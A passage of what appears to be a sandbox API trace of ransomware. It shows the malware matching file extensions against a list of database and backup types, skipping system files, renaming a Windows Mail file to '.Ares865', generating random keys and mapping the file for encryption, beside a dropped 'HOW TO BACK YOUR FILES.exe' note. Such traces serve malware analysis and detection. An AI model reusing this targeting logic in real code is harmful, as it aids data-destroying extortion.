(lpString1="jrs", lpString2="dct") returned 1 [0062.298] lstrlenW (lpString="dcx") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="dcx") returned 1 [0062.298] lstrlenW (lpString="ddl") returned 3 [0062.298] lstrcmpiW (lpString1="jrs", lpString2="ddl") returned 1 [0062.298] lstrlenW (lpString="dlis") returned 4 [0062.298] lstrcmpiW (lpString1=".jrs", lpString2="dlis") returned -1 [0062.298] lstrlenW (lpString="dp1") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="dp1") returned 1 [0062.299] lstrlenW (lpString="dqy") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="dqy") returned 1 [0062.299] lstrlenW (lpString="dsk") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="dsk") returned 1 [0062.299] lstrlenW (lpString="dsn") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="dsn") returned 1 [0062.299] lstrlenW (lpString="dtsx") returned 4 [0062.299] lstrcmpiW (lpString1=".jrs", lpString2="dtsx") returned -1 [0062.299] lstrlenW (lpString="dxl") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="dxl") returned 1 [0062.299] lstrlenW (lpString="eco") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="eco") returned 1 [0062.299] lstrlenW (lpString="ecx") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="ecx") returned 1 [0062.299] lstrlenW (lpString="edb") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="edb") returned 1 [0062.299] lstrlenW (lpString="epim") returned 4 [0062.299] lstrcmpiW (lpString1=".jrs", lpString2="epim") returned -1 [0062.299] lstrlenW (lpString="fcd") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="fcd") returned 1 [0062.299] lstrlenW (lpString="fdb") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="fdb") returned 1 [0062.299] lstrlenW (lpString="fic") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="fic") returned 1 [0062.299] lstrlenW (lpString="flexolibrary") returned 12 [0062.299] lstrcmpiW (lpString1="res00002.jrs", lpString2="flexolibrary") returned 1 [0062.299] lstrlenW (lpString="fm5") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="fm5") returned 1 [0062.299] lstrlenW (lpString="fmp") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="fmp") returned 1 [0062.299] lstrlenW (lpString="fmp12") returned 5 [0062.299] lstrcmpiW (lpString1="2.jrs", lpString2="fmp12") returned -1 [0062.299] lstrlenW (lpString="fmpsl") returned 5 [0062.299] lstrcmpiW (lpString1="2.jrs", lpString2="fmpsl") returned -1 [0062.299] lstrlenW (lpString="fol") returned 3 [0062.299] lstrcmpiW (lpString1="jrs", lpString2="fol") returned 1 [0062.299] lstrlenW (lpString="fp3") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="fp3") returned 1 [0062.300] lstrlenW (lpString="fp4") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="fp4") returned 1 [0062.300] lstrlenW (lpString="fp5") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="fp5") returned 1 [0062.300] lstrlenW (lpString="fp7") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="fp7") returned 1 [0062.300] lstrlenW (lpString="fpt") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="fpt") returned 1 [0062.300] lstrlenW (lpString="frm") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="frm") returned 1 [0062.300] lstrlenW (lpString="gdb") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="gdb") returned 1 [0062.300] lstrlenW (lpString="gdb") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="gdb") returned 1 [0062.300] lstrlenW (lpString="grdb") returned 4 [0062.300] lstrcmpiW (lpString1=".jrs", lpString2="grdb") returned -1 [0062.300] lstrlenW (lpString="gwi") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="gwi") returned 1 [0062.300] lstrlenW (lpString="hdb") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="hdb") returned 1 [0062.300] lstrlenW (lpString="his") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="his") returned 1 [0062.300] lstrlenW (lpString="ib") returned 2 [0062.300] lstrcmpiW (lpString1="rs", lpString2="ib") returned 1 [0062.300] lstrlenW (lpString="idb") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="idb") returned 1 [0062.300] lstrlenW (lpString="ihx") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="ihx") returned 1 [0062.300] lstrlenW (lpString="itdb") returned 4 [0062.300] lstrcmpiW (lpString1=".jrs", lpString2="itdb") returned -1 [0062.300] lstrlenW (lpString="itw") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="itw") returned 1 [0062.300] lstrlenW (lpString="jet") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="jet") returned 1 [0062.300] lstrlenW (lpString="jtx") returned 3 [0062.300] lstrcmpiW (lpString1="jrs", lpString2="jtx") returned -1 [0062.300] lstrlenW (lpString="kdb") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="kdb") returned -1 [0062.301] lstrlenW (lpString="kexi") returned 4 [0062.301] lstrcmpiW (lpString1=".jrs", lpString2="kexi") returned -1 [0062.301] lstrlenW (lpString="kexic") returned 5 [0062.301] lstrcmpiW (lpString1="2.jrs", lpString2="kexic") returned -1 [0062.301] lstrlenW (lpString="kexis") returned 5 [0062.301] lstrcmpiW (lpString1="2.jrs", lpString2="kexis") returned -1 [0062.301] lstrlenW (lpString="lgc") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="lgc") returned -1 [0062.301] lstrlenW (lpString="lwx") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="lwx") returned -1 [0062.301] lstrlenW (lpString="maf") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="maf") returned -1 [0062.301] lstrlenW (lpString="maq") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="maq") returned -1 [0062.301] lstrlenW (lpString="mar") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="mar") returned -1 [0062.301] lstrlenW (lpString="marshal") returned 7 [0062.301] lstrcmpiW (lpString1="002.jrs", lpString2="marshal") returned -1 [0062.301] lstrlenW (lpString="mas") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="mas") returned -1 [0062.301] lstrlenW (lpString="mav") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="mav") returned -1 [0062.301] lstrlenW (lpString="maw") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="maw") returned -1 [0062.301] lstrlenW (lpString="mdbhtml") returned 7 [0062.301] lstrcmpiW (lpString1="002.jrs", lpString2="mdbhtml") returned -1 [0062.301] lstrlenW (lpString="mdn") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="mdn") returned -1 [0062.301] lstrlenW (lpString="mdt") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="mdt") returned -1 [0062.301] lstrlenW (lpString="mfd") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="mfd") returned -1 [0062.301] lstrlenW (lpString="mpd") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="mpd") returned -1 [0062.301] lstrlenW (lpString="mrg") returned 3 [0062.301] lstrcmpiW (lpString1="jrs", lpString2="mrg") returned -1 [0062.301] lstrlenW (lpString="mud") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="mud") returned -1 [0062.302] lstrlenW (lpString="mwb") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="mwb") returned -1 [0062.302] lstrlenW (lpString="myd") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="myd") returned -1 [0062.302] lstrlenW (lpString="ndf") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="ndf") returned -1 [0062.302] lstrlenW (lpString="nnt") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="nnt") returned -1 [0062.302] lstrlenW (lpString="nrmlib") returned 6 [0062.302] lstrcmpiW (lpString1="02.jrs", lpString2="nrmlib") returned -1 [0062.302] lstrlenW (lpString="ns2") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="ns2") returned -1 [0062.302] lstrlenW (lpString="ns3") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="ns3") returned -1 [0062.302] lstrlenW (lpString="ns4") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="ns4") returned -1 [0062.302] lstrlenW (lpString="nsf") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="nsf") returned -1 [0062.302] lstrlenW (lpString="nv") returned 2 [0062.302] lstrcmpiW (lpString1="rs", lpString2="nv") returned 1 [0062.302] lstrlenW (lpString="nv2") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="nv2") returned -1 [0062.302] lstrlenW (lpString="nwdb") returned 4 [0062.302] lstrcmpiW (lpString1=".jrs", lpString2="nwdb") returned -1 [0062.302] lstrlenW (lpString="nyf") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="nyf") returned -1 [0062.302] lstrlenW (lpString="odb") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="odb") returned -1 [0062.302] lstrlenW (lpString="odb") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="odb") returned -1 [0062.302] lstrlenW (lpString="oqy") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="oqy") returned -1 [0062.302] lstrlenW (lpString="ora") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="ora") returned -1 [0062.302] lstrlenW (lpString="orx") returned 3 [0062.302] lstrcmpiW (lpString1="jrs", lpString2="orx") returned -1 [0062.302] lstrlenW (lpString="owc") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="owc") returned -1 [0062.303] lstrlenW (lpString="p96") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="p96") returned -1 [0062.303] lstrlenW (lpString="p97") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="p97") returned -1 [0062.303] lstrlenW (lpString="pan") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="pan") returned -1 [0062.303] lstrlenW (lpString="pdb") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="pdb") returned -1 [0062.303] lstrlenW (lpString="pdm") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="pdm") returned -1 [0062.303] lstrlenW (lpString="pnz") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="pnz") returned -1 [0062.303] lstrlenW (lpString="qry") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="qry") returned -1 [0062.303] lstrlenW (lpString="qvd") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="qvd") returned -1 [0062.303] lstrlenW (lpString="rbf") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="rbf") returned -1 [0062.303] lstrlenW (lpString="rctd") returned 4 [0062.303] lstrcmpiW (lpString1=".jrs", lpString2="rctd") returned -1 [0062.303] lstrlenW (lpString="rod") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="rod") returned -1 [0062.303] lstrlenW (lpString="rodx") returned 4 [0062.303] lstrcmpiW (lpString1=".jrs", lpString2="rodx") returned -1 [0062.303] lstrlenW (lpString="rpd") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="rpd") returned -1 [0062.303] lstrlenW (lpString="rsd") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="rsd") returned -1 [0062.303] lstrlenW (lpString="sas7bdat") returned 8 [0062.303] lstrcmpiW (lpString1="0002.jrs", lpString2="sas7bdat") returned -1 [0062.303] lstrlenW (lpString="sbf") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="sbf") returned -1 [0062.303] lstrlenW (lpString="scx") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="scx") returned -1 [0062.303] lstrlenW (lpString="sdb") returned 3 [0062.303] lstrcmpiW (lpString1="jrs", lpString2="sdb") returned -1 [0062.303] lstrlenW (lpString="sdc") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="sdc") returned -1 [0062.304] lstrlenW (lpString="sdf") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="sdf") returned -1 [0062.304] lstrlenW (lpString="sis") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="sis") returned -1 [0062.304] lstrlenW (lpString="spq") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="spq") returned -1 [0062.304] lstrlenW (lpString="te") returned 2 [0062.304] lstrcmpiW (lpString1="rs", lpString2="te") returned -1 [0062.304] lstrlenW (lpString="teacher") returned 7 [0062.304] lstrcmpiW (lpString1="002.jrs", lpString2="teacher") returned -1 [0062.304] lstrlenW (lpString="tmd") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="tmd") returned -1 [0062.304] lstrlenW (lpString="tps") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="tps") returned -1 [0062.304] lstrlenW (lpString="trc") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="trc") returned -1 [0062.304] lstrlenW (lpString="trc") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="trc") returned -1 [0062.304] lstrlenW (lpString="trm") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="trm") returned -1 [0062.304] lstrlenW (lpString="udb") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="udb") returned -1 [0062.304] lstrlenW (lpString="udl") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="udl") returned -1 [0062.304] lstrlenW (lpString="usr") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="usr") returned -1 [0062.304] lstrlenW (lpString="v12") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="v12") returned -1 [0062.304] lstrlenW (lpString="vis") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="vis") returned -1 [0062.304] lstrlenW (lpString="vpd") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="vpd") returned -1 [0062.304] lstrlenW (lpString="vvv") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="vvv") returned -1 [0062.304] lstrlenW (lpString="wdb") returned 3 [0062.304] lstrcmpiW (lpString1="jrs", lpString2="wdb") returned -1 [0062.304] lstrlenW (lpString="wmdb") returned 4 [0062.304] lstrcmpiW (lpString1=".jrs", lpString2="wmdb") returned -1 [0062.305] lstrlenW (lpString="wrk") returned 3 [0062.305] lstrcmpiW (lpString1="jrs", lpString2="wrk") returned -1 [0062.305] lstrlenW (lpString="xdb") returned 3 [0062.305] lstrcmpiW (lpString1="jrs", lpString2="xdb") returned -1 [0062.305] lstrlenW (lpString="xld") returned 3 [0062.305] lstrcmpiW (lpString1="jrs", lpString2="xld") returned -1 [0062.305] lstrlenW (lpString="xmlff") returned 5 [0062.305] lstrcmpiW (lpString1="2.jrs", lpString2="xmlff") returned -1 [0062.305] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs.Ares865") returned 83 [0062.305] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edbres00002.jrs.ares865"), dwFlags=0x1) returned 1 [0062.306] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\edbres00002.jrs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0062.306] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0062.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0062.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0062.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0062.307] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0062.307] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0062.307] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0062.308] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x164 [0062.310] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x190000 [0062.310] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3240000 [0062.810] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0062.830] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0062.830] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.830] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0062.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0062.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0062.830] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0062.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0062.830] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0062.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0062.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0062.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0062.831] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0062.831] CloseHandle (hObject=0x164) returned 1 [0062.831] CloseHandle (hObject=0x154) returned 1 [0062.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0062.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0062.832] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0062.840] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a7dc1e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a7dc1e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0062.840] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0062.840] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4a8284a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x410, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oeold.xml.Ares865", cAlternateFileName="OEOLDX~1.ARE")) returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2=".") returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="..") returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="windows") returned -1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="bootmgr") returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="temp") returned -1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="pagefile.sys") returned -1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="boot") returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="ids.txt") returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="ntuser.dat") returned 1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="perflogs") returned -1 [0062.841] lstrcmpiW (lpString1="oeold.xml.Ares865", lpString2="MSBuild") returned 1 [0062.841] lstrlenW (lpString="oeold.xml.Ares865") returned 17 [0062.841] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 75 [0062.841] lstrcpyW (in: lpString1=0x2cce478, lpString2="oeold.xml.Ares865" | out: lpString1="oeold.xml.Ares865") returned="oeold.xml.Ares865" [0062.841] lstrlenW (lpString="oeold.xml.Ares865") returned 17 [0062.841] lstrlenW (lpString="Ares865") returned 7 [0062.841] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0062.841] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="aoldtz.exe") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2=".") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="..") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="windows") returned -1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="bootmgr") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="temp") returned -1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="pagefile.sys") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="boot") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="ids.txt") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="ntuser.dat") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="perflogs") returned 1 [0062.841] lstrcmpiW (lpString1="Stationery", lpString2="MSBuild") returned 1 [0062.841] lstrlenW (lpString="Stationery") returned 10 [0062.841] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\oeold.xml.Ares865") returned 77 [0062.842] lstrcpyW (in: lpString1=0x2cce478, lpString2="Stationery" | out: lpString1="Stationery") returned="Stationery" [0062.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0062.842] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x2d1ea0 [0062.842] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23a8 | out: ListHead=0x2e7710, ListEntry=0x2d23a8) returned 0x2d2288 [0062.842] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7b05332, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="aoldtz.exe") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="..") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="windows") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="bootmgr") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="temp") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="pagefile.sys") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="boot") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="ids.txt") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="ntuser.dat") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="perflogs") returned 1 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="MSBuild") returned 1 [0062.842] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0062.842] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned 70 [0062.842] lstrcpyW (in: lpString1=0x2cce478, lpString2="WindowsMail.MSMessageStore" | out: lpString1="WindowsMail.MSMessageStore") returned="WindowsMail.MSMessageStore" [0062.842] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0062.842] lstrlenW (lpString="Ares865") returned 7 [0062.842] lstrcmpiW (lpString1="geStore", lpString2="Ares865") returned 1 [0062.842] lstrlenW (lpString=".dll") returned 4 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".dll") returned 1 [0062.842] lstrlenW (lpString=".lnk") returned 4 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".lnk") returned 1 [0062.842] lstrlenW (lpString=".ini") returned 4 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".ini") returned 1 [0062.842] lstrlenW (lpString=".sys") returned 4 [0062.842] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".sys") returned 1 [0062.842] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0062.842] lstrlenW (lpString="bak") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="bak") returned 1 [0062.843] lstrlenW (lpString="ba_") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="ba_") returned 1 [0062.843] lstrlenW (lpString="dbb") returned 3 [0062.843] lstrcmpiW (lpString1="ore", lpString2="dbb") returned 1 [0062.843] lstrlenW (lpString="vmdk") returned 4 [0062.843] lstrcmpiW 